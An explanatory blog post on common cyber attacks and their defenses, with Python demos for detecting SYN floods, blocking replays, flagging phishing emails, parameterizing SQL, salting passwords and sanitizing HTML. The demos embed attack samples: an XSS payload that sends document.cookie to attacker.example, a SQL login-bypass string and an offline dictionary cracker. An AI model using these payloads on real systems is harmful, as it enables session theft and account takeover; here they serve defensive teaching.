From infiltration of infrastructure to spear phishing and brute force, a hacker attack happens every 39 seconds. Does that statistic sound scary? The list of cyber threats at work every day is long, and this post aims to cover the most important of them.
Former Cisco CEO John Chambers once said,
“There are two types of companies: those that have been hacked, and those who don’t yet know they have been hacked.”
Can you defend against something you don't know about?
This is where attackers' increasingly sophisticated techniques come in. They do not target only large organizations; even children's identities are not safe. Individuals, small businesses and large corporations are all affected.
With attackers and threats multiplying, individuals, organizations and their employees all need to take steps to deal with them, especially since our habit of connecting everything to the internet keeps increasing the number of exposed vulnerabilities and the chances of a breach.
If you still believe that changing your passwords now and then keeps you secure, those days are gone; the number of cyber attacks has grown tremendously, and the defenses have to grow with them.
Malware and phishing are familiar terms, but only a few people actually know the mechanics of these attacks. Understanding how each one is delivered clarifies which security controls are needed against it. Knowing that threats exist while not knowing where they come from or how to defend against them is deeply uncomfortable.
In this walk-through, I break down some of the most common forms of attack and how to defend yourself and your business against them. I will keep the flashy vocabulary to a minimum and complement the text with visuals, so it should be understandable to every netizen out there.
Let’s begin with the basics!
HACKER is HERE…. This is a small excerpt of what I have been doing to your cyber world.
The most Common yet Disastrous Cyber Threats
A cyber attack is any malicious act that targets computer information systems, networks, IT infrastructure or personal devices, using various methods to steal, alter or destroy data or systems.
A cybersecurity threat is an attempt to damage or steal data, or to disrupt digital life in general. Cyber attacks include computer viruses, denial-of-service (DoS) attacks and data breaches; many are nuisances, some are quite serious, and a few can threaten human lives.
Cyber attack is an umbrella term covering a wide range of activities, including:
- Tampering systems and data
- Resource exploitation
- Unauthorized access to the system and accessing sensitive information
- Disrupting regular business’ functioning and its processes
- Using various attacks to encrypt data and extort money from victims
Although cyber attacks are carried out for many different purposes and with many different techniques, attackers share an arsenal of tools and resources and add to it whenever the need arises.
For now, let's discuss the most common types of attack, the ones hackers keep drawing on to design deadlier variations.
Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) Attacks
Imagine you are in traffic on a one-lane road, with cars bumper to bumper as far as the eye can see. Normally this road never carries more than a car or two, but the county fair is on and this road is the only way out of town for visitors. The road cannot handle the massive traffic and becomes so jammed that nobody can leave.
This is what happens to a website in a denial-of-service (DoS) attack: when a site receives more traffic than it was built to handle, its server is overloaded and can no longer serve content to the visitors who are trying to use it. Often the overload is deliberate, with an attacker flooding the site to shut it down for all users.
When the flood comes from many computers at the same time, it is called a distributed denial-of-service (DDoS) attack. This is even harder to withstand: the traffic arrives from many different IP addresses simultaneously, which makes it harder for network administrators to find the source and stops the server from fulfilling legitimate requests. Attackers often use this to extort money from the victim.
There are different versions of DoS and DDoS attacks:
- TCP SYN flood attack: the attacker sends a stream of SYN packets without ever completing the TCP three-way handshake, filling the server's queue of half-open connections so that legitimate clients cannot connect.
- Smurf attack: the attacker sends ICMP echo requests to broadcast addresses with the source spoofed to the victim's IP, so every host on those networks replies to the victim and saturates its link.
- Teardrop attack: the attacker sends IP fragments whose length and fragmentation offset fields overlap; vulnerable hosts crash when they try to reassemble them.
- Ping-of-death attack: the attacker sends fragmented ICMP echo packets that reassemble to more than the IP maximum of 65,535 bytes, overflowing buffers on hosts that do not check the total size.
- Botnets: large numbers of malware-infected systems under an attacker's control, used to generate DDoS traffic. They are hard to trace because the infected machines are spread across many geographic locations.
DDoS attacks are not only rising, but are also getting bigger and more devastating than ever before; from websites to banks, it seems like no one is immune.
In fact, a 2017 Cisco report forecast that the number of DDoS attacks exceeding 1 gigabit per second would rise to 3.1 million a year by 2021.
Let’s detect and prevent DoS and DDoS attacks
When it comes to detection, there are different methods to choose from, like:
- Packet analysis: an in-line DDoS mitigation device inspects every packet and can detect and mitigate anomalies immediately. Such a device may see traffic in both directions (symmetric processing) or only the inbound direction (asymmetric processing).
- Flow sampling: the router samples packets and exports records (NetFlow, sFlow or IPFIX) summarizing those packets. Most routers support this, and it scales well because only a fraction of the traffic is examined.
- Mirrored data packets: a SPAN port or network tap copies traffic to an analysis device sitting out of the traffic path. This allows in-depth analysis and quick anomaly detection; the downside is that it does not scale to very high traffic volumes.
When a DDoS attack is detected, the victim's edge router can announce the attacked address via BGP (Border Gateway Protocol) to the ISP's routers with a blackhole marker, so that upstream routers send traffic for that address to a Null0 route at the next hop (remotely triggered black hole filtering). Note that this also drops legitimate traffic to that address: it protects the rest of the network at the cost of the target.
There are a few countermeasures to mitigate DoS and DDoS attacks:
- Place servers behind a firewall that limits the rate of inbound SYN packets, and enable SYN cookies on the hosts so half-open connections do not consume state.
- Increase the size of the connection backlog queue and decrease the timeout on half-open connections.
- Disable IP-directed broadcasts at the routers.
- Configure end systems not to respond to ICMP packets sent to broadcast addresses.
- Block ping-of-death attacks with a firewall that checks the reassembled size of fragmented IP packets against the maximum.
- RFC 3704 (BCP 84) ingress filtering, which denies traffic from spoofed source addresses and ensures that traffic is traceable to its origin network.
- Blackhole filtering to drop undesirable traffic before it enters a network.
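The flow-sampling detection and the RFC 3704 ingress check described above can be automated. The script below is an added example for this article, not code from the original page or from any vendor's product: it runs over constructed flow records laid out like a NetFlow/sFlow export, flags a destination whose SYN-only flows dwarf its established connections, and flags source addresses that fall inside the network's own prefix even though they were sampled on the upstream interface. The field layout, the thresholds and the owned prefix 198.51.100.0/24 are assumptions made for the example.

```python
"""Spot a TCP SYN flood and spoofed sources in sampled flow records.

Added example for this article, not code from the original page or any vendor
tool. The flow records are constructed to resemble what a NetFlow/sFlow export
would give you; field layout, thresholds and the owned prefix are assumptions.
"""
import ipaddress
from collections import defaultdict

# Constructed sample flows as (src, dst, dst_port, tcp_flags, packets).
# "S" = SYN only (half-open), "PA" = PSH/ACK (an established connection).
SAMPLE_FLOWS = [
    ("203.0.113.10", "198.51.100.5", 443, "S", 1),
    ("203.0.113.10", "198.51.100.5", 443, "PA", 12),
    ("203.0.113.20", "198.51.100.5", 443, "S", 1),
    ("203.0.113.20", "198.51.100.5", 443, "PA", 30),
]
# 50 half-open connections to port 80 from 50 different sources: a SYN flood.
SAMPLE_FLOWS += [(f"192.0.2.{i}", "198.51.100.5", 80, "S", 1) for i in range(1, 51)]
# A packet that claims a source inside our own prefix but arrived from upstream.
SAMPLE_FLOWS.append(("198.51.100.200", "198.51.100.5", 80, "S", 1))

# Address space this network owns (assumed for the example). Seen as a source on
# the upstream interface it can only be spoofed: RFC 3704 / BCP 38 filtering.
OWNED_PREFIX = ipaddress.ip_network("198.51.100.0/24")


def syn_flood_targets(flows, min_syns=20, max_established_ratio=0.2):
    """Return {(dst, port): counts} where SYN-only flows dwarf established ones.

    A healthy service sees roughly one SYN per later data-carrying flow; under
    a SYN flood the SYN-only count climbs while established flows do not.
    """
    syn_only = defaultdict(int)
    established = defaultdict(int)
    for _src, dst, port, flags, _packets in flows:
        if flags == "S":
            syn_only[(dst, port)] += 1
        elif "A" in flags and "S" not in flags:   # SYN/ACK replies do not count
            established[(dst, port)] += 1
    suspects = {}
    for key, syns in syn_only.items():
        if syns >= min_syns and established[key] / syns <= max_established_ratio:
            suspects[key] = {"syn_only": syns, "established": established[key]}
    return suspects


def spoofed_sources(flows, owned_prefix=OWNED_PREFIX):
    """Sources sampled on the upstream side that fall inside our own prefix."""
    return {src for src, *_ in flows if ipaddress.ip_address(src) in owned_prefix}


if __name__ == "__main__":
    for (dst, port), counts in syn_flood_targets(SAMPLE_FLOWS).items():
        print(f"possible SYN flood against {dst}:{port}: {counts}")
    for src in sorted(spoofed_sources(SAMPLE_FLOWS)):
        print(f"spoofed source (inside {OWNED_PREFIX}): {src}")
```

On the sample data, port 443 is healthy (two SYNs, two established flows) and is left alone, while port 80 shows 51 half-open connections and nothing established. In a real deployment the same ratio would be computed per export interval, and a positive result would feed the blackhole or rate-limit step rather than just a print.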
Man-in-the-Middle (MitM) Attack
A man-in-the-middle (MitM) attack is one where the attacker secretly intercepts and relays messages between two parties who believe they are talking directly to each other. Once in the conversation, the attacker can read, filter and manipulate everything that passes, including sensitive information; passive interception on its own is also known as eavesdropping.
Intercepting and altering messages between two parties long predates computers; militaries have used it to confuse enemy communications.
There are two common points of entry for MitM attacks:
- On unsecured public Wi-Fi, the attacker inserts themselves between a device and the network. Without knowing it, the user passes all information through the attacker.
- Once a device has been breached, the attacker installs software that processes all of the victim's information.
Some common types of man-in-the-middle attacks are:
- Session hijacking
In this type of attack, the attacker takes over an established session between a client and a server. The attacking machine substitutes its own IP address for the client's while the server continues the session, believing it is still talking to the client.
See how it works
- You connect to a server.
- The attacker gains a vantage point on that connection (for example, on the same network segment) and learns its addresses and sequence numbers.
- The attacker disconnects you from the server.
- The attacker’s computer replaces your IP address with its own and spoofs your sequence numbers.
- Now, the attacker is in dialog with the server, and the server believes it is communicating with you.
- IP Spoofing
IP spoofing is another tactic: the attacker convinces your system that it is communicating with a known, trusted entity in order to gain access. The attacker sends packets carrying the IP source address of a trusted host instead of their own; the targeted host may accept the packets and act on them.
- Replay
A replay attack happens when an attacker captures and saves old messages and sends them again later, impersonating one of the original parties. It is countered with session timestamps or a nonce (a random value used only once) that the receiver checks before acting on a message.
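Here is the timestamp-plus-nonce countermeasure in working form, as an added example for this article (not code from the original page). Sender and receiver share a key; every message carries a timestamp, a random nonce and an HMAC over the whole envelope, and the receiver rejects anything stale, anything whose nonce it has already accepted, and anything whose MAC fails. The JSON envelope format, the shared key and the 30-second freshness window are assumptions made for the example.

```python
"""Reject replayed messages with a timestamp, a nonce and a MAC.

Added example for this article (not code from the original page). Both sides
share a secret key; every message carries a timestamp, a random nonce and an
HMAC over all of it. The receiver rejects anything that is too old, anything
whose nonce it has already seen, and anything whose MAC does not verify.
The envelope format and the 30-second window are assumptions for the example.
"""
import hashlib
import hmac
import json
import os
import time

SHARED_KEY = b"example-shared-key"   # constructed for the example
FRESHNESS_WINDOW = 30                # seconds a message stays acceptable


def build_message(payload, key=SHARED_KEY, now=None):
    """Sender side: attach timestamp and nonce, then MAC the whole envelope."""
    envelope = {
        "payload": payload,
        "ts": int(now if now is not None else time.time()),
        "nonce": os.urandom(16).hex(),
    }
    body = json.dumps(envelope, sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest()
    return {"body": body.decode(), "mac": tag}


class Receiver:
    """Verifier that remembers the nonces accepted within the freshness window."""

    def __init__(self, key=SHARED_KEY, window=FRESHNESS_WINDOW):
        self.key = key
        self.window = window
        self.seen = {}   # nonce -> timestamp it was accepted with

    def accept(self, message, now=None):
        """Return (ok, reason_or_payload). Only a fresh, unseen, authentic message is ok."""
        now = now if now is not None else time.time()
        body = message["body"].encode()
        expected = hmac.new(self.key, body, hashlib.sha256).hexdigest()
        # Constant-time comparison: a plain == would leak timing information.
        if not hmac.compare_digest(expected, message["mac"]):
            return False, "bad mac"
        envelope = json.loads(body)
        if abs(now - envelope["ts"]) > self.window:
            return False, "stale timestamp"
        # Forget nonces older than the window (their timestamp check rejects them
        # anyway), then refuse any nonce we have already accepted.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        if envelope["nonce"] in self.seen:
            return False, "replay"
        self.seen[envelope["nonce"]] = envelope["ts"]
        return True, envelope["payload"]


def demo():
    """Show one acceptance and the three rejections (replay, stale, tampered)."""
    rx = Receiver()
    t0 = 1_700_000_000
    msg = build_message({"action": "transfer", "amount": 100}, now=t0)
    first = rx.accept(msg, now=t0 + 1)
    replayed = rx.accept(msg, now=t0 + 2)       # attacker resends the capture
    late = rx.accept(build_message({"action": "ping"}, now=t0), now=t0 + 120)
    forged = dict(msg, body=msg["body"].replace("100", "999"))
    tampered = rx.accept(forged, now=t0 + 3)
    return first, replayed, late, tampered


if __name__ == "__main__":
    for label, result in zip(("first", "replayed", "late", "tampered"), demo()):
        print(f"{label}: {result}")
```

The nonce cache only has to cover the freshness window, which is what keeps its memory bounded; without the timestamp the receiver would have to remember every nonce forever. The MAC is checked before anything else so that an attacker cannot probe the nonce cache with forged envelopes.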
How to counter Man-in-the-middle attacks?
Currently, there is no single technology or configuration that prevents all kinds of MitM attacks.
Generally, encryption and digital certificates are effective against MitM attacks, protecting both the confidentiality and the integrity of communications.
But encryption alone does not help if the attacker can sit in the middle, terminate the encrypted session on their own machine and open a fresh one to the real server. So how can you make sure that the endpoint you are talking to does not belong to the attacker?
This is what certificate authorities and digital signatures, built on cryptographic hash functions, exist for: they bind a public key to an identity so that a client can verify who is at the other end.
One way to protect your organization from MitM attacks is to encrypt data in transit, for example with a VPN on untrusted networks. Companies also put auditing and monitoring in place so that staff activity is supervised regularly and staff stay educated.
Another option is to verify your TLS/SSL setup: clients must actually validate certificates, and servers should present valid ones and use HSTS so that browsers refuse to downgrade to plain HTTP.
Phishing and Spear-Phishing Attacks
According to Dark Reading, a cyber security news site, 91% of cyber attacks start with a phishing email. Phishing is a social engineering attack in which fraudulent communications that appear to come from a trusted source are used to steal information or trick people into installing malware.
Phishing scams have been doing damage since the 1990s and keep adopting newer techniques, which is why attackers stay a step ahead of users; phishing scams in the United States increased by 297 percent in 2018 compared to the previous year.
Phishing, being the easiest, is the leading cause of cyber security incidents in the world. It involves sending emails that appear to be from trusted entities, with a strong subject line and an attachment: a job offer, an invoice, a big discount from a known shipping service, or an important message from a senior executive of the company.
Spear phishing is the same idea with a more targeted approach, backed by some research on the individual target. With a little research, a phisher can identify your colleagues' email addresses and send a seemingly legitimate email from a trusted source instructing you to download a file (malware) or hand over your login details.
Because of this, spear phishing is hard to identify and harder to defend against. Beyond falsifying the "From" field of the email, scammers add credibility to their story by website cloning: copying a legitimate website to fool you into entering personally identifiable information (PII) or credentials.
You may be wondering how phishers get your email address in the first place.
There are multiple ways scammers obtain email addresses; the most prevalent are:
- Dishonest “subscribe” boxes
- Buying it illegally
- Harvesting programs (bots that crawl and scrape websites for email addresses)
- Data brokers
Other forms of phishing include:
Smishing is phishing by text message: the messages lure you into giving away personal information, are often sent through an online SMS service, and contain links to fake websites.
Malware-based phishing gets you to download malware disguised as an urgent update, a pop-up, an attachment or even a PDF; once installed, it may redirect you to a fake version of the legitimate website you are trying to reach.
Vishing is phishing by phone call: the scammer contacts you directly and urges you to hand over personal information right away.
Alongside these, 2019 has already produced newer variants of social engineering: attacks abusing biometrics, AI and IoT devices.
How to protect against Phishing attacks?
- Staff must be trained to recognize fraudulent emails and to know what to do when they receive one; phishing staff awareness courses can be of great help.
- Use email filtering technologies to stop phishing messages before they reach users.
- Train users on the correct protocols for password security.
- Look at the "Reply-To" and "Return-Path" headers and make sure they match the source you believe the email is from.
- Stop for a minute and analyze the email.
- Hover over links: move the mouse over a link to see where it really goes, but do not click it.
- Sandboxing: open email content in a sandbox environment and log what happens when the attachment is opened or the links are clicked.
- If you receive an "urgent" request, check with the company supposedly requesting the information through a channel you already trust.
- Never download anything from a download request that appears as a pop-up, especially on an insecure (non-HTTPS) site.
- To avoid being targeted by an email harvesting program, do not share your address online in a form that can be scraped.
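Several of the manual checks above (compare the From domain with Reply-To and Return-Path, look at where a link really points, be wary of urgency) can be scripted. The following is an added example for this article, not code from the original page or from any mail-filtering product: it parses a raw message with Python's standard email and HTML parsers and returns a list of findings. The sample message, its domains and IP address are constructed for the example; the set of indicators is this example's own selection, not a complete phishing detector.

```python
"""Flag phishing indicators in a raw email: header mismatches and deceptive links.

Added example for this article, not code from the page or any product. The
message below is constructed; the checks mirror the manual advice above
(compare From with Reply-To/Return-Path, look at where a link really goes).
"""
import re
from email import message_from_string, policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the From looks like a known vendor, but replies and bounces
# go elsewhere and the visible link text disagrees with the real target.
SAMPLE_EMAIL = """\
From: Billing <billing@example-shipping.com>
Reply-To: support@example-shipping-verify.net
Return-Path: <bounce@mail-relay.example.org>
Subject: URGENT: invoice overdue
Content-Type: text/html

<html><body>
<p>Your account will be suspended. Please <a href="http://198.51.100.23/login">
https://example-shipping.com/account</a> now.</p>
</body></html>
"""


def header_domain(msg, name):
    """Return the lower-cased domain of the first address in a header, or None."""
    value = msg.get(name)
    if not value:
        return None
    match = re.search(r"@([A-Za-z0-9.-]+)", value)
    return match.group(1).lower() if match else None


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from the anchors in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def phishing_indicators(raw):
    """Return human-readable findings for one raw RFC 5322 message."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []
    sender = header_domain(msg, "From")
    for header in ("Reply-To", "Return-Path"):
        other = header_domain(msg, header)
        if other and sender and other != sender:
            findings.append(f"{header} domain {other} differs from From domain {sender}")
    body = msg.get_body(preferencelist=("html", "plain"))
    html = body.get_content() if body else ""
    collector = LinkCollector()
    collector.feed(html)
    for href, text in collector.links:
        target = urlparse(href).hostname or ""
        if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", target):
            findings.append(f"link points at a bare IP address: {href}")
        shown = urlparse(text).hostname if "://" in text else None
        if shown and shown != target:
            findings.append(f"link text shows {shown} but goes to {target}")
    if re.search(r"\burgent\b", msg.get("Subject", ""), re.IGNORECASE):
        findings.append("subject uses urgency language")
    return findings


if __name__ == "__main__":
    for finding in phishing_indicators(SAMPLE_EMAIL):
        print("-", finding)
```

Run against the sample, it reports the two header mismatches, the bare-IP link, the link whose text and target disagree, and the urgent subject. A message with consistent headers and no links produces an empty list. Such heuristics are a triage aid for the "stop for a minute and analyze" step; they do not replace the filtering gateway or the user's judgment.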
SQL Injection Attack
Structured Query Language (SQL) injection is one of the oldest tricks in cybercrime and still among the most effective; the 2011 PlayStation Network (PSN) breach that exposed the personal data of 77 million users was widely reported to have started with SQL injection.
An SQL injection occurs when an attacker smuggles a malicious query fragment into an SQL-backed application, which passes it on to the database server; as a result, the server is forced to expose sensitive data from the database. The attack is executed by typing SQL syntax into an input field on a web page, such as a login form or a search box, that the application concatenates into its query.
An SQL injection not only lets the attacker peek into the database but can also let them modify (insert, update or delete) data, run administrative commands, recover the contents of files, issue commands to the operating system, and even wipe out the database.
SQL injection is a common issue in database-driven websites and anywhere dynamic SQL is built from user input. It is especially common in older PHP and ASP applications because their traditional database interfaces encourage string-built queries; J2EE and ASP.NET applications tend to fare better because their standard data-access interfaces make parameterized queries the natural choice.
How to prevent SQL injections?
Injection attacks are, considering the damage they can do, paradoxically simple to avoid. Here are some steps to prevent SQL injection attacks:
- Avoid building dynamic queries from user input
- Validate input (type, length, format) before it reaches the database layer
- Use parameterized database queries, so that even if SQL syntax is inserted into a field it is bound as data and cannot change the query's intent
- Stored procedures can have the same effect as parameterized queries, provided they do not build dynamic SQL internally.
- Prefer allow-list input validation (what is permitted) over block-lists (what is forbidden), which attackers routinely bypass.
- CAPTCHA checks ("I'm not a robot" boxes) on forms slow down automated probing, but do nothing against a hand-typed payload.
- A web application firewall can block known injection patterns; treat it as a backstop, not as a fix for the code.
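The difference between a string-built query and a parameterized one is easiest to see side by side. The following is an added example for this article, not code from the original page: a login check written both ways against an in-memory SQLite database with one constructed user, driven with the classic tautology payload. The schema, the account and the use of a bare SHA-256 for the password are assumptions made for brevity (a real application would use a slow, salted password hash).

```python
"""SQL injection: a string-built login query beside its parameterized fix.

Added example for this article (not code from the original page). It uses an
in-memory SQLite database with one constructed user so the payload can be run
end to end; the schema and credentials are this example's assumptions, and
unsalted SHA-256 stands in for a real password hash purely for brevity.
"""
import hashlib
import sqlite3


def make_db():
    """Create the constructed users table with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    pw_hash = hashlib.sha256(b"correct horse battery staple").hexdigest()
    conn.execute("INSERT INTO users VALUES (?, ?)", ("alice", pw_hash))
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string formatting: attacker text becomes SQL."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password_hash = '{pw_hash}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized: the driver binds the values, so quotes in input stay data."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, pw_hash),
    ).fetchone()
    return row[0] if row else None


# Classic tautology payload: closes the quote, ORs in a true condition, and
# comments out the rest of the statement (the password check).
PAYLOAD = "alice' OR '1'='1' -- "


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, bad password, payload as username:",
          login_vulnerable(conn, PAYLOAD, "wrong"))
    print("parameterized, same input:", login_safe(conn, PAYLOAD, "wrong"))
```

With the payload as the username and a wrong password, the vulnerable version returns "alice" because the resulting statement reads `... WHERE username = 'alice' OR '1'='1' -- ' AND password_hash = '...'`; the parameterized version looks for a user literally named `alice' OR '1'='1' -- ` and finds nothing. The database library, not the application, is what keeps data and code apart.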
Password Attack
Passwords are the most commonly used authentication mechanism, so obtaining them is a natural goal. A person's password can be obtained by looking around their desk, sniffing the network, using social engineering, acquiring a password database, or outright guessing.
The last approach can be done in a random or a systematic manner.
Brute-force guessing tries many different password combinations, often seeded with things related to the person: job title, name, hobbies and the like.
In a dictionary attack, a list of common passwords is the attacker's lifeline: either they obtain a copy of the file containing the hashed passwords, hash the dictionary the same way and compare the results, or they try the dictionary entries against the login itself.
To protect against password attacks:
- Implement an account lockout policy so that the account is locked after a few invalid attempts.
- Follow account lockout best practices when setting it up: a lockout that never expires lets an attacker lock legitimate users out on purpose, so pair it with a reasonable unlock window and rate limiting, and store passwords with a per-user salt and a slow hash so that a stolen database cannot be cracked with one pass over a word list.
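The offline dictionary attack described above, and the two defenses against it, can be shown in a few dozen lines. This is an added example for this article, not code from the original page: the "leaked" hash list and the word list are constructed, and the lockout parameters (five failures in fifteen minutes) are an assumption. Unsalted hashes fall to a single precomputed table; per-user salts with a slow key derivation function force the attacker to redo the work for every account, and the lockout policy caps what an online guesser can try.

```python
"""Offline dictionary attack against leaked hashes, and an online lockout policy.

Added example for this article, not code from the original page. The "leaked"
hash list, the word list and the policy parameters are constructed here.
"""
import hashlib
import os
from collections import defaultdict

WORDLIST = ["123456", "password", "letmein", "qwerty", "dragon", "welcome1"]

# Constructed leak: unsalted SHA-256 hashes, as a poorly built app might store them.
LEAKED_UNSALTED = {
    "alice": hashlib.sha256(b"welcome1").hexdigest(),
    "bob": hashlib.sha256(b"letmein").hexdigest(),
    "carol": hashlib.sha256(b"correct horse battery staple").hexdigest(),
}

PBKDF2_ITERATIONS = 100_000   # assumed; tune upward for production hardware


def crack_unsalted(leaked, wordlist):
    """Hash each word once and look it up: one pass cracks every user who reused it."""
    table = {hashlib.sha256(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table[h] for user, h in leaked.items() if h in table}


def store_salted(password):
    """What the defender should store: a random per-user salt and a slow KDF."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


def crack_salted(leaked, wordlist):
    """Every candidate must be re-derived for every user: no shared lookup table."""
    found = {}
    for user, (salt, digest) in leaked.items():
        for w in wordlist:
            if hashlib.pbkdf2_hmac("sha256", w.encode(), salt, PBKDF2_ITERATIONS) == digest:
                found[user] = w
                break
    return found


class LockoutPolicy:
    """Lock an account after N failures within a window; it unlocks once they expire."""

    def __init__(self, max_failures=5, window=900):
        self.max_failures = max_failures
        self.window = window
        self.failures = defaultdict(list)   # account -> failure timestamps

    def is_locked(self, account, now):
        recent = [t for t in self.failures[account] if now - t < self.window]
        self.failures[account] = recent     # drop failures outside the window
        return len(recent) >= self.max_failures

    def record_failure(self, account, now):
        self.failures[account].append(now)


if __name__ == "__main__":
    print("unsalted leak cracked:", crack_unsalted(LEAKED_UNSALTED, WORDLIST))
    salted = {u: store_salted(p) for u, p in [("alice", "welcome1"), ("carol", "correct horse battery staple")]}
    print("salted leak cracked:", crack_salted(salted, WORDLIST))
    policy = LockoutPolicy(max_failures=3, window=60)
    for t in (0, 1, 2):
        policy.record_failure("bob", t)
    print("bob locked at t=3:", policy.is_locked("bob", 3), " at t=100:", policy.is_locked("bob", 100))
```

Against the unsalted leak the word list cracks alice and bob in one pass; against the salted store only the weak password still falls, and each guess costs a full key derivation per user. The lockout expires on its own, which is what keeps it from being turned into a denial-of-service against your own users.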
Drive-by Download Attack
Drive-by downloads are another common way of spreading malware. Insecure websites let attackers plant a malicious script into their HTTP or PHP code, and simply visiting such a site can be enough for malware to install.
It can also happen while viewing an email message or a pop-up window; unlike most attacks, this one does not need you to actively do anything to enable it.
A drive-by download takes advantage of an app, operating system or web browser with security flaws that have not been patched.
How to prevent Drive-by downloads
- Keep your browsers and operating systems up to date, so that a malicious page finds nothing to exploit.
- Stick to the sites you normally use, remembering that even these can be compromised.
- Remove unnecessary programs, apps and plug-ins from your device; every extra plug-in is another potential vulnerability for drive-by attacks.
Cross-site Scripting (XSS) Attack
XSS attacks inject malicious script into content served by a trusted site so that it runs in the victim's web browser or scriptable application. The script might send the victim's cookie to the attacker's server, where the attacker extracts it and uses it for session hijacking.
The most dangerous consequence is that the script becomes a springboard for further exploitation: beyond stealing cookies, an attacker can log keystrokes, discover and collect network information, capture screenshots, and remotely access and control the victim's machine.
Practices to avoid XSS attacks
To defend against XSS attacks, the best you can do is:
- Input validation: ensuring that an application accepts only the data it expects, preventing unwanted data from harming the site, the database and its users. Validation rejects input that contains characters or structures a field should never hold, rather than trying to clean it up afterwards.
- Sanitizing: another way to prevent cross-site scripting is to sanitize user input, stripping or neutralizing markup the application does not want; it is a strong defense but should not be used alone. Sanitizing is most useful on sites that deliberately allow some HTML markup. You may well need all three methods to beat XSS, the third being output encoding: escaping untrusted data for the context (HTML body, attribute, JavaScript, URL) in which the page renders it, so that it is displayed as text rather than interpreted as code.
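Output encoding and allow-list sanitizing look like this in practice. The code below is an added example for this article, not code from the original page or from any framework: a comment is rendered unescaped (the vulnerable form), then with HTML escaping (for sites that show user text as text), and finally through a small allow-list sanitizer (for sites that permit a little markup) that drops script blocks, unknown tags, event-handler attributes and non-http(s) link targets. The payloads and the set of allowed tags are this example's own choices.

```python
"""Stored XSS: unescaped rendering beside output encoding and an allow-list sanitizer.

Added example for this article, not code from the original page. The comment
payloads are constructed; the allowed tag set is this example's own choice.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

PAYLOADS = [
    '<script>fetch("http://attacker.example/?c=" + document.cookie)</script>',
    '<img src=x onerror="alert(1)">',
    '<a href="javascript:alert(1)">click</a>',
    'Plain <b>bold</b> text with a <a href="https://example.com/">link</a>',
]


def render_vulnerable(comment):
    """Reflects the comment into the page as-is: the browser runs the payload."""
    return f"<div class='comment'>{comment}</div>"


def render_encoded(comment):
    """HTML-body context: escape &, <, > and quotes so markup becomes visible text."""
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


class AllowListSanitizer(HTMLParser):
    """Keep a small set of tags and attributes; drop everything else, including
    the bodies of script/style elements and any URL scheme other than http(s)."""

    ALLOWED = {"b": set(), "i": set(), "p": set(), "a": {"href"}}
    DROP_CONTENT = {"script", "style"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.DROP_CONTENT:
            self._skip_depth += 1
            return
        if self._skip_depth or tag not in self.ALLOWED:
            return
        kept = []
        for name, value in attrs:
            if name not in self.ALLOWED[tag] or value is None:
                continue   # unknown attributes (onerror, style, ...) are dropped
            if name == "href" and urlparse(value).scheme not in ("http", "https"):
                continue   # javascript:, data:, vbscript: ... are dropped
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in self.DROP_CONTENT:
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if not self._skip_depth and tag in self.ALLOWED:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(html.escape(data, quote=False))


def sanitize(fragment):
    """Return HTML containing only allowed tags, allowed attributes and http(s) URLs."""
    parser = AllowListSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    for p in PAYLOADS:
        print("vulnerable :", render_vulnerable(p))
        print("encoded    :", render_encoded(p))
        print("sanitized  :", sanitize(p) or "(nothing left)")
        print()
```

The first three payloads come out of the sanitizer empty or defanged (the javascript: link keeps its text but loses its href), while the legitimate bold text and https link survive untouched. Output encoding is the simpler and safer default; a sanitizer is only worth the extra attack surface when users genuinely need to post markup, and even then it should be allow-list based as here, never a list of bad tags to strip.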
Malware Attack
Malicious software (malware) is unwanted software installed on your system without your consent. It often attaches itself to legitimate code and propagates from there, lurking in useful applications or replicating across the Internet.
Some of the most common types of malware are:
- Macro viruses: these infect applications such as Microsoft Word or Excel by attaching to the application's initialization sequence. When the application is launched, the virus executes its instructions before handing control back to the application, then replicates and attaches itself to other code on the system. The Melissa virus of 1999 is the best-known example.
- System or boot-record infectors: a boot-record virus attaches to the master boot record of a hard disk. When the system starts, it loads the virus from the boot sector into memory, from where it spreads to other disks and computers. In some cases data disappears from partitions, in others the computer becomes unstable; often the infected computer fails to start up or cannot find the hard drive.
- File infectors: these attach themselves to executable code, such as .exe files, and run when that code is loaded. Another variant creates a companion file with the same name as a legitimate program but an .exe extension, so that the virus runs in its place. They are often memory-resident: once executed, they stay in the computer's memory and infect further programs. Examples include Jerusalem and Cascade.
